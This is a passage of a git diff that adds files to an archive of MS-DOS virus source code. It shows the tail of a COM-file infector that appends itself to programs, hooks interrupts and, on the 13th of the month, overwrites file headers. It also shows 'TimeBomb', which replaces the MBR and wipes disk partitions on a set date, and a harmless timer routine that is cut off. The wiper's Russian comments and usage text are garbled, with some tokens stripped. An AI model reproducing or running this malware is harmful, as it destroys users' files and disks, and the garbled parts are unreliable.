[BX+16H],SI ; + CMP BYTE PTR [DI-1],5CH ; Is the PATH closed by + ; a backslash? + JE Find_First_FileName ; Yes + MOV AL,5CH ; + STOSB ; Place Backslash + +; +; +; Find First Filename +; +; + +Find_First_FileName: + MOV [BX+18H],DI ; Store at which address + ; the path starts + ; BX=SI + MOV SI,BX ; Restore SI + ADD SI,10H ; + MOV CX,6 ; + REP MOVSB ; Set Search.Spec. + MOV SI,BX ; Restore SI + + MOV AH,4EH ; + MOV DX,26H ; + ADD DX,SI ; Filename:= *.COM + MOV CX,3 ; Search Attributes: + ; Read Only/Hidden + INT 21H ; Find 1st Filename to + ; match with DS:DX + JMP SHORT Error_Handler ; + NOP + +; +; +; Find Next Filename +; +; + +Find_Next_FileName: + MOV AH,4FH ; + INT 21H ; Find next Filename to + ; match with DS:DX + +; +; +; Error Handler +; +; + +Error_Handler: + JNC Check_Filelength ; Jump if carry=0, so + ; no errors + JMP SHORT Error ; Carry Set, so error + ; occured + +; +; +; Check Filelength and look if file is already infected. 
+; +; + + +Check_Filelength: + MOV AX,DS:DATA_1E[SI] ; (761D:0064=0) + AND AL,1FH + CMP AL,7 + JE Find_Next_FileName ; File already infected. + CMP WORD PTR DS:DATA_3E[SI],0FA00H + ; Is the length of the + ; file more as FA00h bytes? + JA Find_Next_FileName ; Yes. + CMP WORD PTR DS:DATA_3E[SI],0F00H + ; Is the length of the + ; file less as 0F00h bytes? + JB Find_Next_FileName ; Yes + MOV DI,[SI+18H] ; Get address of path of virus + PUSH SI ; Store SI + ADD SI,6CH +Set_FileName: + LODSB ; Set up Filename for + STOSB ; infection. + CMP AL,0 ; End Of Filename Reached? + JNE Set_FileName ; No + +; +; +; Set Temporary File attributes +; +; + + POP SI ; Restore SI + MOV CX,[SI+63H] ; + MOV CH,0 ; + MOV [SI+8],CX ; Get File-Attributes + MOV AX,CX ; + MOV CX,0FFFEH ; + AND AX,CX ; Remove Read-Only Attribute + MOV CX,AX ; + MOV AX,4301H ; + MOV DX,26H ; + ADD DX,SI ; + INT 21H ; Set File-Attributes + +; +; +; Open the File +; +; + + MOV AX,3D02H ; Open the file for both + INT 21H ; reading and writing + JNC Give_Infection_Marker ; If no error occured... + JMP Set_FileAttributes_Back ; Error occured + +Give_Infection_Marker: + MOV BX,AX + MOV CX,DS:DATA_2E[SI] ; (761D:0066=0) + MOV [SI+6],CX + MOV CX,DS:DATA_1E[SI] ; (761D:0064=0) + AND CL,0E0H + OR CL,7 + MOV [SI+4],CX + JMP SHORT Get_Current_Time ; (2967) + NOP + +; +; +; This Part will be installed resident after hooking INT 20h +; +; + + PUSHF ; Push flags + PUSH DS + PUSH ES + PUSH SS + PUSH AX + PUSH BX + PUSH DX + PUSH DI + PUSH SI + PUSH BP + MOV DX,43H + MOV AL,74H ; This will change the refesh + OUT DX,AL ; rate, thus slowing down the + MOV DX,41H ; PC. Every normal program- + MOV AL,8 ; termination by calling + OUT DX,AL ; INT 20h will call this + MOV AL,7 ; rourtine + OUT DX,AL ; + POP BP + POP SI + POP DI + POP DX + POP BX + POP AX + POP SS + POP ES + POP DS + POPF ; Pop flags + JMP CS:DATA_5 ; (761D:0253=9090H) + ; JMP to org. 
INT 20h address + ADD [BX+SI],AL + ADD [BX+SI],AL + +; +; +; Get Current Time +; +; + +Get_Current_Time: + PUSH AX ; Store all registers + PUSH BX + PUSH CX + PUSH DX + PUSH DS + PUSH ES + PUSH SI + PUSH DI + PUSH BP + MOV AH,2CH ; Get current time into CX:DX + INT 21H ; CX=hrs/min, DX=sec/hund.sec + CMP DL,32H ; Are we above 32/100 seconds? + JA Get_INT_F2_Vector ; Yes + JMP Start_Trigger_Check ; No + +; +; +; Get Interrupt Vector of INT F2h +; +; + +Get_INT_F2_Vector: + MOV AH,35H ; Get the interrupt vector of + MOV AL,0F2H ; INT 0F2h into ES:BX + INT 21H ; + + CMP BX,7777H ; Was INT F2 already hooked? + + JNE Allocate_Memory ; No + JMP INT_F2_Already_Hooked ; +Allocate_Memory: + MOV AX,DS ; + DEC AX ; + MOV ES,AX ; + MOV BX,0 ; + CMP BYTE PTR ES:[BX],5AH ; + JE Memory_Already_Allocated + PUSH BX ; + MOV AH,48H ; Allocate 4096 16-byte-para- + MOV BX,0FFFFH ; graphs in memory. ??? + INT 21H ; + CMP BX,5 ; Is the largest available + ; 5 or higher? + JAE Again_Allocate_Memory ; Yes + JMP Start_Trigger_Check ; No +Again_Allocate_Memory: + MOV AH,48H ; Again allocate memory + INT 21H ; + POP BX ; + JNC Segment_Decrease ; If there was no error when + ; allocating memory the last + ; time + JMP Start_Trigger_Check ; If there was an error +Segment_Decrease: + DEC AX ; Decrease Segment of Allcated + ; memory + MOV ES,AX ; + MOV BX,1 ; + MOV WORD PTR ES:[BX],0 ; + MOV BX,0 ; + CMP BYTE PTR ES:[BX],5AH ; + JE Memory_Allocated ; + JMP SHORT Start_Trigger_Check + NOP ; +Memory_Allocated: + MOV BX,3 ; + ADD AX,ES:[BX] ; + INC AX ; + MOV BX,12H ; + MOV ES:[BX],AX ; +Memory_Already_Allocated: + MOV BX,3 ; + MOV AX,ES:[BX] ; + SUB AX,5 ; + JC Start_Trigger_Check ; Jump if carry Set + MOV ES:[BX],AX ; + MOV BX,12H ; + SUB WORD PTR ES:[BX],5 ; + MOV ES,ES:[BX] ; + PUSH SI ; Store SI + SUB SI,1F2H ; SI points to the part + MOV DI,0 ; which must become + MOV CX,46H ; resident. 
+ REP MOVSB ; Move the 46h bytes from + ; [SI] to ES:[DI] + POP SI ; Restore SI + MOV BP,ES ; + PUSH CS ; + POP ES ; Restore ES + + MOV AH,25H ; Hook interrupt F2h + MOV AL,0F2H ; New INT-vector will + MOV DX,7777H ; be DS:7777h + INT 21H ; + JMP SHORT Hook_INT_20h ; (2A10) + NOP + +INT_F2_Already_Hooked: + JMP SHORT Start_Trigger_Check + NOP +Hook_INT_20h: + MOV AL,20H ; + MOV AH,35H ; Get the INT 20h Vector + INT 21H ; into ES:BX + + MOV DX,ES ; + MOV ES,BP ; + PUSH SI ; + MOV AX,SI ; + SUB AX,1CAH ; + MOV DI,SI ; + SUB DI,1F2H ; + SUB AX,DI ; + MOV SI,AX ; + MOV ES:[SI],BX ; + ADD SI,2 ; + MOV ES:[SI],DX ; + SUB SI,4 ; + MOV ES:[SI],AX ; + POP SI ; + PUSH CS ; + POP ES ; + + MOV AH,25H ; Install new INT 20h + MOV DS,BP ; vector to DS:DX + MOV DX,0 ; (=DS:00) + MOV AL,20H ; + INT 21H ; + +; +; +; Start Trigger Check +; +; + +Start_Trigger_Check: + POP BP ; Restore Registers + POP DI + POP SI + POP ES + POP DS + POP DX + POP CX + POP BX + POP AX + MOV AH,2AH ; Get the current date + INT 21H ; CX=year, DX=mon/day + CMP DL,0DH ; Is it the 13th of the month? + JNE Start_Infecting_File ; No + +; +; +; It is the 13th of the Month... Select 1 out of 3 destructions +; +; + + MOV AH,2CH ; Get current time + INT 21H ; CX=hrs/min, DX=sec/hund.sec + CMP DL,3CH ; Are we above 60/100 seconds? + JA Destruction_2 ; Yes + CMP DL,1EH ; Are we above 30/100 seconds? + JA Destruction_3 ; Yes + +; +; +; Destruction Scheme 1: Place the following code at the begining of a +; file: MOV AH,00 +; INT 20h +; NOP +; +; When a file is executed with this code at the begining, the program +; will terminate at once with returning to DOS. 
+; +; + + MOV DX,SI + ADD DX,21H + JMP SHORT Write_5_Destruction_Bytes + NOP + +; +; +; Destruction Scheme 2: Place the following code at the begining of a +; file: HLT +; HLT +; HLT +; HLT +; DB CDh (which is the opcode for INT) +; +; When a file is executed with this code at the begining, the program +; will execute the 4 HLT's and then perform an INT-Call depending on +; the byte following CDh. This can be any INT-Call. So this scheme +; can be consisered the dangeroust of all three destruction schemes. +; will terminate at once with returning to DOS. The first five bytes +; of a file will be overwritten always, making the file useless, but +; issuing and 'random' INT-Call can do much more harm. +; +; + +Destruction_2: + MOV DX,SI + ADD DX,79H + JMP SHORT Write_5_Destruction_Bytes + NOP + +; +; +; Destruction Scheme 3: Place the following code at the begining of a +; file: INT 19h +; INT 19h +; DB ? (Can be anything. It is the 1st byte of the org.file) +; +; When a file is executed with this code at the begining, the program +; will cause a reboot without a memory test and preserving the +; interrupt vectors. If any interrupt vector from 00h through 1Ch has +; been set, the system most likely will hang itself, because of this +; preserving. +; +; + +Destruction_3: + MOV DX,SI + ADD DX,7DH + JMP SHORT Write_5_Destruction_Bytes + NOP + +; +; +; Write the 5 bytes with the destruction to the begining of the file +; +; + +Write_5_Destruction_Bytes: + MOV AH,40H ; + MOV CX,5 ; + INT 21H ; Write 5 bytes to the file + JMP SHORT Set_FileDate_Time_Back + NOP + +; +; +; It is not the 13th of the month... Infect the file +; +; + +Start_Infecting_File: + MOV AH,3FH ; + MOV CX,3 ; Number of bytes to read + MOV DX,0AH ; + ADD DX,SI ; + INT 21H ; Read the bytes from the file + ; and put them at DS:DX + JC Set_FileDate_Time_Back ; If Error Occurred + CMP AL,3 ; 3 Bytes read? 
+ JNE Set_FileDate_Time_Back ; No + + + MOV AX,4202H ; Set the Read/Write + MOV CX,0 ; pointer to the EOF at + MOV DX,0 ; offset CX:DX (=00:00) + INT 21H ; + + MOV CX,AX ; CX=Length of File + SUB AX,3 ; + MOV [SI+0EH],AX ; Store Length -3 bytes + ADD CX,41DH ; CX=CX+41Dh + MOV DI,SI + SUB DI,318H + MOV [DI],CX ; Set new Virus Data Area + ; Address into code + MOV AH,40H ; + MOV CX,3ABH ; CX=3ABh The length of the + ; viral-code written to disk. + MOV DX,SI + SUB DX,31DH ; DX points at the start of + ; the virus code + INT 21H ; Write the viral-code to the + ; file + + JC Set_FileDate_Time_Back ; If an error occured + CMP AX,3ABH ; 3ABh bytes written? + JNE Set_FileDate_Time_Back ; No + MOV AX,4200H ; Move Read/Write Pointer to + MOV CX,0 ; the beginning of the file + MOV DX,0 ; at offset CX:DX(=00:00) + INT 21H ; + + MOV AH,40H ; Write the 1st three new + MOV CX,3 ; bytes to the file. These + MOV DX,SI ; bytes contain the JMP + ADD DX,0DH ; instruction to the virus. + INT 21H ; + +; +; +; Set File-Time/Date back +; +; + +Set_FileDate_Time_Back: + MOV DX,[SI+6] ; Get File-Date + MOV CX,[SI+4] ; Get File-Time + MOV AX,5701H ; Set back the File-Time and + INT 21H ; Date stamps + +; +; +; Close the File +; +; + + MOV AH,3EH ; + INT 21H ; Close the File + +; +; +; Set File Attribute back +; +; + + +Set_FileAttributes_Back: + MOV AX,4301H ; + MOV CX,[SI+8] ; Get File Attribute + MOV DX,26H ; + ADD DX,SI ; + INT 21H ; Set File Attribute + +; +; +; Restore Org DTA address +; +; + +Restore_Org_DTA: + PUSH DS + MOV AH,1AH + MOV DX,[SI] ; Get Original DTA + MOV DS,[SI+2] ; address + INT 21H ; St DTA to ds:dx + +; +; +; Put 3 Original 1st three bytes in place and execute original program +; +; + + POP DS ; Restore DS + PUSH SI ; Store SI + CLD ; + ADD SI,81H ; Address where the 1st three + ; bytes can be found. 
+ MOV DI,100H ; Destination Address + MOV CX,3 ; Number of bytes to move + REP MOVSB ; Move the bytes + POP SI ; Restore SI + POP CX ; Restore CX + XOR AX,AX ; Zero register + XOR BX,BX ; Zero register + XOR DX,DX ; Zero register + XOR SI,SI ; Zero register + MOV DI,100H + PUSH DI ; Store DI + XOR DI,DI ; Zero register + RET 0FFFFH ; Terminate Virus-Code and + ; execute original program. + +; +; +; Virus Data Area +; +; + + +ORG_DTA_ADD: DW ? ; Storing place for BX of + ; original DTA + DW ? ; Storing place for ES of + ; original DTA +File_Time: DW ? ; Storing place for the + ; filetime of the file +Date: DW ? ; Storing place for the + ; filedate +Attrib: DW ? ; Storing place for the + ; file attributes. + +Three_Bytes: DB 0E9h, 27h, 03h + +First_New_Byte: DB 0E9h ; First new byte of the + ; the infected file. This is + ; the jump instruction. +Length_Min_3: DB 0Dh, 27h ; Also new address to jump + ; to for the virus on exe- + ; cution, 2nd and 3rd new byte + +Search_Spec: DB '*.COM',00h + +Path_Add_Org: DW 00,05 + +Path_Add_Vir: DW '6M' + + DB 'PATH=', 00, 00 + +Destruc_Code_1: DB 0B4h, 0h, 0CDh, 20h, 90h + +File_Path: DB 'VIRCOM.COM' ; Filename including PATH + DB 30 DUP(0) + +New_DTA: + DB 02 + DB '????????COM' + DB 03, 11H + DB 7 DUP (0) + DB 20H, 80H, 12H, 17H, 15H, 10H + DB 27H, 0, 0 + +FileName: DB 'VIRCOM.COM', 00h, 00h, 00h + +Destruc_Code_2: DB 0F4H, 0F4H, 0F4H, 0F4H + +Destruc_Code_3: DB 0CDH, 19H, 0CDH, 19H, 0E9H + +First_3_Bytes: DB 0E9h, 45h, 45h + +Notice: DB '(C) Monxla' + +Time ENDP + +SEG_A ENDS + + + + END START + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.timebomb.asm b/MSDOS/Virus.MSDOS.Unknown.timebomb.asm new file mode 100644 index 00000000..4563d0f2 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.timebomb.asm 
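Review bot: The comment on the first `MOV AH,48H` in Allocate_Memory (`Allocate 4096 16-byte-paragraphs in memory. ???`) does not match the code: `MOV BX,0FFFFH` is an over-sized request, so INT 21h/48h fails and leaves the largest free block size in BX, which the following `CMP BX,5` tests before the second, real allocation; the comment should read `; Probe: request FFFFh paragraphs so DOS reports the largest free block in BX`. A second disassembler artefact sits right after `JMP CS:DATA_5`, where the two `ADD [BX+SI],AL` lines appear to be four zero bytes that Hook_INT_20h later fills with `MOV ES:[SI],BX` / `MOV ES:[SI],DX`, i.e. data, and would read more honestly as `DW 0,0 ; saved INT 20h vector, filled in at install`. Since the whole listing is raw disassembler output (the `761D:xxxx` annotations, generated `DATA_nE` names), a one-line header saying so, and noting that DATA_5 is a 9987-byte NOP stand-in for the original host, would help anyone reading this archive copy.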
@@ -0,0 +1,472 @@ +;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; +; (C) ANS (Armourer) TimeBomb Ver 1.00 25 Jun +; FIDOnet 2:461/29.444 FreeWare, SourceWare 1995 +; +; +; MBR. ⨦ । ⠫쭮 堥 +; +; MBR 뢠 䠩 c:\mbr.bak, ⮡ 뫮 ⠭, +; ᫨ . ࠢ MBR 砥, ⠪ ᫨ - +; 㬭, 㧪 ⥬ ⨢ ࠧ - TimeBomb ਤ +; ।. +; +; ࠡ뢠 TimeBomb 4 樫 ࠧ +; , ᪨ ᪨ DOS (extended partition) +; +; , Non-DOS ࠧ (HPFS, ਬ) ⮬ ࠤ +; ⥫쭮 - 裡 ७ ⫨稥 DOS FAT. +; +killed_cyl = 4 ; ᫮ 㡨 樫஢ ࠧ +xor_value = 73h ; 祭 ஢ 襣 ᫥ ᫮ ;-) + + locals +cseg segment + assume cs:cseg + org 100h + .286 +start proc near +; +; ⠫ +; + ; ஢塞 ப + mov si, 80h + mov bl, byte ptr [si] + xor bh, bh + cmp bl, 8 + jnc @@checkdate + + +help: + ; ப 㪠 - 뢮 ᪠ + mov dx, offset @@title + mov ah, 9 + int 21h + int 20h + + + ; 祭 BCD-᫠ . ப +getBCD proc near + dec si + mov ax, word ptr [si+bx] ; ६ ᫥ + sub ax, '00' ; ASCII -> BIN + xchg al, ah + db 0d5h, 10h ; AAD 䨪஬ 16 + cmp al, 9ah + jnc help + dec si ; ࠧ 室 ᫥饬 + dec si + retn +getBCD endp + + +@@checkdate: ; ஢塞 (᭠砫 , ⥬ , ⥬ ᫮) + ; ਢ 㦭 ଠ + ; ४⭮ ஢塞 - ஡ 짮⥫ - + ; ⠬ + call getBCD ; ६ + mov byte ptr year, al ; 稫 BCD-year + cmp byte ptr [bx+si+1], '.' ; ஢塞 ࠧ⥫ + jne help + call getBCD ; ६ + mov byte ptr month, al ; 稫 BCD-month + cmp byte ptr [bx+si+1], '.' 
; ஢塞 ࠧ⥫ + jne help + call getBCD ; ६ + mov byte ptr day, al ; 稫 BCD-day + + +@@singledisk: +; +; 塞 MBR ᢮ bomb proc +; +; ⠥ MBR, ࠭塞 c:\mbr.bak, 襬 ᥡ +; + ; ⠥ MBR + mov cx, 1 + mov dx, 80h + mov ax, 201h + mov bx, offset buffer + int 13h + jnc @@rd_ok + + mov dx, offset @@rd_err + +@@err_exit: ; 뢮 ᮮ饭 DX 뫥 訡 + mov ah, 9 + int 21h + retn + +@@rd_ok: + ; 䠩 + mov dx, offset @@fname + xor cx, cx + mov ah, 3ch + int 21h + jnc @@cr_ok + + mov dx, offset @@cr_err + jmp @@err_exit + +@@cr_ok: + ; 襬 䠩 + mov bx, ax + mov cx, 512 + mov dx, offset buffer + mov ah, 40h + int 21h + jnc @@wr_ok + + mov dx, offset @@wr_err + jmp @@err_exit + +@@wr_ok: + ; 뢠 䠩 + mov ah, 3eh + int 21h + +; +; ७ᨬ ᢮ MBR ண +; + mov si, offset bomb + mov di, offset buffer + mov bx, di + mov cx, di + sub cx, si + cld + rep movsb + +; +; 뢠 MBR ண +; + mov cx, 1 + mov dx, 80h + mov ax, 301h + int 13h + + mov dx, offset @@mbr_wr_err + jc @@err_exit + + mov dx, offset @@done_msg + jmp @@err_exit + + + ; 饭 訡 +@@rd_err: db 'Error read the MBR of C:',13,10,'$' +@@cr_err: db 'Error creating the ' +@@fname: db 'C:\MBR.BAK',0,'file',13,10,'$' +@@wr_err: db 'Error writing backup file',13,10,'$' +@@mbr_wr_err: db 'Error writing new MBR',13,10,'$' +@@done_msg: db 'Your MBR replaced by TimeBomb',13,10,'$' + + + ; ⠢ +@@title: +db 13,10,10 +db '(C) Armourer TimeBomb Ver 1.00 25 Jun 1995',13,10,10 +db ' Usage: timebomb ',13,10,10 +db ' Where is a fatal date for your computer.',13,10 +db ' Date format must be in exUSSR standard: DD.MM.YY',13,10,10 +db 'Good Luck ;)',13,10,'$' + +start endp + + + +;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; +; . 
MBR ( MBR ) +; +; 㤥 ⮢ 0:7c00h +; +bomb proc near + + ; ࠨ ⥪ ७ᨬ MBR, 㤠 (0:600h) + cli + mov ax, cs + mov ss, ax + mov ds, ax + mov es, ax + mov si, 7c00h + mov sp, si + push si ; 㦭 ᫥饣 boot' + cld + mov cx, 1beh / 2 ; ᫥ ⠪ ७ SI 㤥 㪠뢠 + mov di, 600h ; + rep movsw + + push ax ; + push offset beginbomb - offset bomb + 600h ; 饭 + retf + + +beginbomb: + ; ஢塞 ६ + mov ah, 4 + int 1ah ; 竨 CX:DX + jc @@skipbomb ; ᫨ ࠡ -> ய᪠ ஢ + +year = $ + 2 + cmp cl, 12h ; ஢塞 + jc @@skipbomb ; ᮢ ;) + jne @@explode ; ᫨ 襫 - 뢠 + +month = $ + 3 +day = $ + 2 + cmp dx, 1234h ; ⠪, ⮡ ᣥ஢ + ; ⪨ ਠ CMP + jc @@skipbomb ; ᮢ + + +@@explode: + ; + ; ᮢ, 諠 ୠ ... + ; + ; ࠥ 樫 ࠧ ( ᪨ + ; ᪨ DOS) + ; + ; ⠭ ࠬ + mov dl, 80h + call destroy + + ; ⠭ ࠬ ண , ᫨ + ror dl, 1 ; ᫨ , 䫠 CF 㤥 ⠭ + jc @@singledisk + + mov dl, 81h + call destroy + +@@singledisk: + jmp @@incorrect ; 뢮 ᮮ饭 "Missing operating ssytem" + + +@@skipbomb: +; +; ࠡ⪠ ଠ쭮 MBR +; + ; 饬 㧮 ࠧ + mov cl, 4 ; ᥣ 4 ਠ ... + +@@searchboot: ; ᪠ + mov dx, word ptr [si] ; ࠧ 㦠 DX , 㦭 + cmp dl, 80h ; ࠧ 㧮 ? + je @@boot + + add si, 10h ; 室 ᫥饩 + loop @@searchboot + + ; 諨 - 뤠 ᮮ饭 +@@incorrect: + call errmsg + db 'Missing operating system',0 + + +@@boot: ; 㦠 boot-ᥪ । ࠢ + mov cx, word ptr [si+2] ; - CX + mov ax, 201h ; ⠥ 1 ᥪ + pop bx ; 0:7c00h + push bx + int 13h + jnc @@exit + + call errmsg + db 'Error reading operating system',0 + +@@exit: + cmp word ptr [bx + 510], 0aa55h + jne @@incorrect + retn ; ᪠ boot + +; +; ணࠬ +; + + ; 뤠 ᮮ饭 訡 +errmsg proc near + sti + cld + pop si + mov ah, 0eh +@@nextchar: + lodsb + or al, al + je $ + int 10h + jmp @@nextchar +errmsg endp + + + ; 室 ࠧ ᪠ ࠬ஢ +getpart proc near + ; ४ᨢ 㭪. + ; 室 SI ॡ 㪠⥫ । ࠧ + ; ES:DI ࠬ ⥪.ࠧ + + mov cx, 4 ; 稪 ࠧ MBR + +@@nextpart: + ; ஢塞 ⨯ ࠧ + cmp byte ptr [si+4], 0 ; ᯮ㥬 ࠧ + je @@exit + + ; 襬 ࠬ ࠧ + mov ax, word ptr [si] ; + stosw + mov dx, ax ; ⮢ 室 ४ + +disk1 = $ + 1 + mov dl, 80h ; ࠡ뢠 ᪠ + + mov ax, word ptr [si+2] + stosw ; /ᥪ + + ; ஢塞 ⨯ ࠧ - ७ ? 
+ cmp byte ptr [si+4], 5 + jne @@exit ; - + + ; 塞 ४ + ; ⠥ MBR ७ ࠧ + push cx ; ࠭塞 稪 + push si ; ࠭塞 㪠⥫ ࠧ + add bx, 512 ; த 㪠⥫ + mov cx, ax ; CX:DX 㪠뢠 MBR + mov ax, 201h ; ७ ࠧ + int 13h ; ⠥ ७ ࠧ 0:BX + jnc @@rec ; ஢ઠ ४⭮ + + ; 室 ४ᨨ 砥 ᡮ + pop si + pop cx + sub bx, 512 + jmp @@exit + +@@rec: + mov si, bx ; ⠭ 㪠⥫ + add si, 1beh ; ⠡ ࠧ + call getpart + + +@@exit: + add si, 10h + loop @@nextpart + + ; 室 ४ᨨ + sub bx, 512 + pop dx + pop si + pop cx + push dx + retn + +getpart endp + + + ; ⮦ ᮤন ⥪饣 ᪠ +destroy proc near + + ; 砥 ࠬ , 㪠 DL + mov byte ptr ds:[offset disk - offset bomb + 600h], dl + mov byte ptr ds:[offset disk1 - offset bomb + 600h], dl + mov ah, 8 + int 13h + mov byte ptr ds:[heads - offset bomb + 600h], dh + and cl, 63 + mov byte ptr ds:[sectors - offset bomb + 600h], cl + push dx + + mov bx, 0a00h ; ⥭ MBR ७ ࠧ + ; 室 BX 㤥 ਡ 512 - + ; ⠪ ᨬ ஢ + ; ⠢ 57 ࠧ + mov di, 500h ; ࠬ int 13h (64 ᪠) + + ; ᨢ 室 ᪨ ᪨, 뢠 ࠬ + ; int 13h + push si ; ४ 室 ४ + push cx + + xor ax, ax ; ⠭ ࠭ MBR + stosw + inc ax + stosw + + call getpart ; 室 ࠧ + + + ; 祭 ய뢠 + ; bx ய뢠 ࠣ - 800h + push di ; ࠭塞 㪠⥫ 墮 ᯨ᪠ ࠬ஢ + mov di, bx ; DI 㤥 㪠⥫ + shl di, 4 ; 㤥 ᯮ ᬥ饭 8000h + push di ; ࠭塞 + +@@nextword: + mov si, offset lmd - offset bomb + 600h + mov cx, 16 +@@nextchar: + lodsb + xor al, xor_value + stosb + loop @@nextchar + dec bx + jne @@nextword + + + ; + pop bx ; ⠭ + pop si ; ⠭ 㪠⥫ ࠬ + mov cx, si ; 塞 ᫮ ࠥ ࠧ + sub cx, 500h + shr cx, 2 + + std + lodsw ; 室 ᫥ + + +@@nextpart: + push cx ; ࠭塞 稪 + + lodsw ; ६ ࠬ ࠧ + mov cx, ax ; /ᥪ + lodsw + mov dx, ax ; + +disk = $ + 1 + mov dl, 80h ; ࠥ ᪠ + + mov si, killed_cyl ; 稪 㡨 樫஢ + + ; ய뢠 ࠧ +@@nexthead: +sectors = $ + 1 + mov ax, 310h ; !!!! + int 13h + inc dh ; + +heads = $ + 2 + cmp dh, 16 ; 樫 ? 
+ jne @@nexthead + + add cx, 64 ; 騩 樫 + xor dh, dh ; 稭 㫥 + dec si + jne @@nexthead + + pop cx ; ⠭ 稪 + loop @@nextpart ; ⨬ 横 ࠧ + + pop dx + retn +destroy endp + + +lmd: + irpc ch, + db '&ch' xor xor_value + endm + +bomb endp + + +buffer: ;  㤥 mbr + dw offset buffer - offset bomb +cseg ends +end start diff --git a/MSDOS/Virus.MSDOS.Unknown.timebomb.doc b/MSDOS/Virus.MSDOS.Unknown.timebomb.doc new file mode 100644 index 00000000..489cbe35 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.timebomb.doc @@ -0,0 +1,19 @@ + ͻ + ͻ ͹ Just another stuff from + ¿ ¿ ͹ + ͹ < Private Armoury > + ͹ + ͹ ͹ FIDOnet 2:461/29.444 + ͵ BOMB ͹ ͼ + ͼ + + >-> ⠫ MBR ਣ쭮 稪 + >-> ⨦ 㪠 ⠫樨 + >-> 㭨⮦ DOS-ࠧ 1 2 ⪨ ᪠ + >-> ⢥ ० Non-DOS ࠧ ⠬ + <-< ࠭ ० MBR 䠩 C:\MBR.BAK + <-< ஢ 室 ⥪ (asm286) + + >-> >-> ᭨ ᥡ ⢥⢥ <-< <-< + >-> >-> ० ଠ樨, ந襤訥 १ <-< <-< + >-> >-> ஦ 饭 ணࠬ... ;))) <-< <-< diff --git a/MSDOS/Virus.MSDOS.Unknown.timer.asm b/MSDOS/Virus.MSDOS.Unknown.timer.asm new file mode 100644 index 00000000..558e1ea9 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.timer.asm 
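Review bot: The committed text of this file has lost its non-ASCII content in two ways that make the archive copy unreliable for readers: the Russian (cp866) comments throughout the hunk are mojibake (the header block and the `;` notes in `bomb`, `getpart` and `destroy`), and every angle-bracketed token has been stripped, so `irpc ch,` under `lmd:` has an empty argument and the usage text reads `Usage: timebomb ` / `Where is a fatal date`. Whether the loss happened before the commit or in this rendering is not visible here; either way the file should carry a header line such as `; NOTE: original cp866 comments and <...> tokens lost in transcription — listing incomplete` rather than being left as a silently incomplete listing, and the original bytes (or a one-time UTF-8 transcoding) kept alongside. The same mojibake affects Virus.MSDOS.Unknown.timebomb.doc added in this commit.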
@@ -0,0 +1,141 @@
+PAGE ,132
+ title \asm_sour\timer.asm HIGH ACCURACY TIMER
+ subttl michael e. walraven
+.MODEL MEDIUM
+
+name timer
+.cref
+.lall
+
+;
+; High resolution timer, returns a 32 bit high resolution
+; value which is the amount of elapsed time since the function
+; was last called. The counts are 838.2ns each (1.19318 MHz)
+; time_int() must be called first to set the timer chip to
+; the proper mode.
+; Counter 0 is changed in time_int() and the data from this
+; counter is used in elaptime() so it must not be changed
+; between calls.
+; There should not be any interference in system timing
+; max of 55 msec error introduced by time_int() into absolute
+; system time.
+
+; MEDIUM memory model/microsoft 5.00
+; FAR PROGRAM, NEAR DATA
+; cs: is code segment
+; es: and ds: are data segment
+; ss: within data segment
+; ax: for integer return
+; dx:ax: for long return
+
+.DATA
+; these data items located in the DSEG and can be accessed
+; as near by C programs
+
+ PUBLIC SYS_HI
+ PUBLIC SYS_LOW
+ PUBLIC TIMER_COUNT
+
+SYS_HI DW ? ;TIMER_HI VALUE FOR PREVIOUS CALL
+SYS_LOW DW ? ;TIMER_LOW VALUE FOR PREVIOUS CALL
+TIMER_COUNT DW ? ;8253 TIMER COUNT FOR PREVIOUS CALL
+
+
+; NO ARGUMENTS PASSED to either function
+
+TIMER_MODE EQU 043H
+TIMER0 EQU 040H
+
+BIOS SEGMENT AT 040H
+ ORG 06CH
+TIMER_LOW DW ?
+TIMER_HI DW ?
+BIOS ENDS
+
+PAGE
+.CODE
+
+ PUBLIC _time_int
+_time_int PROC
+
+; void far time_int(void);
+;
+; SET THE TIMER MODE FOR PULSE OUTPUT, RATHER THAN SQUARE
+; MODE AS SET BY DOS
+
+ MOV AL,00110100B ;CTR 0, LSB THEN MSB
+ ;MODE 2, BINARY
+ OUT TIMER_MODE,AL ;MODE REGISTER FOR 8253
+ SUB AX,AX ;SET 0, RESULT IN MAX COUNT
+ OUT TIMER0,AL
+ OUT TIMER0,AL
+ RET
+_time_int ENDP
+
+
+ PUBLIC _elaptime
+_elaptime PROC
+
+; long int far elaptime(void);
+;
+; DETERMINE ELAPSED TIME SINCE LAST CALL
+; RETURNS 32 BIT (LONG) VALUE WHICH IS
+; NEW - TIMER_HI:TIMER_LO:TIMER_COUNT MINUS
+; OLD - TIMER_HI:TIMER_LO:TIMER_COUNT
+
+; ASSUMPTION MADE THAT 32 BITS WILL NOT OVERFLOW!!!!
+
+ PUSH ES
+ MOV AX,BIOS
+ MOV ES,AX
+ ASSUME ES:BIOS
+
+ MOV AL,0 ;PREPARE TO LATCH COUNTER
+ OUT TIMER_MODE,AL ;LATCH 8253
+
+ PUSHF ;SAVE INTERRUPT STATE
+ CLI ;TURN INTERRUPT OFF WHILE READING CODE
+ IN AL,TIMER0
+ MOV DL,AL
+ IN AL,TIMER0
+ MOV DH,AL ;DX HAS NEW CHIP COUNT(count down value)
+
+ MOV BX,ES:TIMER_LOW ;BX HAS SYSTEM TIME LOW WORD
+ MOV AX,ES:TIMER_HI ;AX HAS SYSTEM TIME HIGH WORD
+
+; NOW HAVE A 48 BIT WORD AX:BX:DX FOR THE PRESENT TIME
+ MOV CX,TIMER_COUNT ;SWAP AND SUBTRACT
+ MOV TIMER_COUNT,DX
+ SUB CX,DX
+
+; CX: HAS LOW 16 BITS OF DIFFERENCE
+
+ MOV DX,SYS_LOW ;SWAP AND SUBTRACT
+ MOV SYS_LOW,BX
+ SBB BX,DX
+
+; BX: HAS MID 16 BITS OF DIFFERENCE
+
+ MOV DX,SYS_HI ;SWAP AND SUBTRACT
+ MOV SYS_HI,AX
+ SBB AX,DX
+
+; AX: HAS HIGH 16 BITS OF DIFFERENCE
+
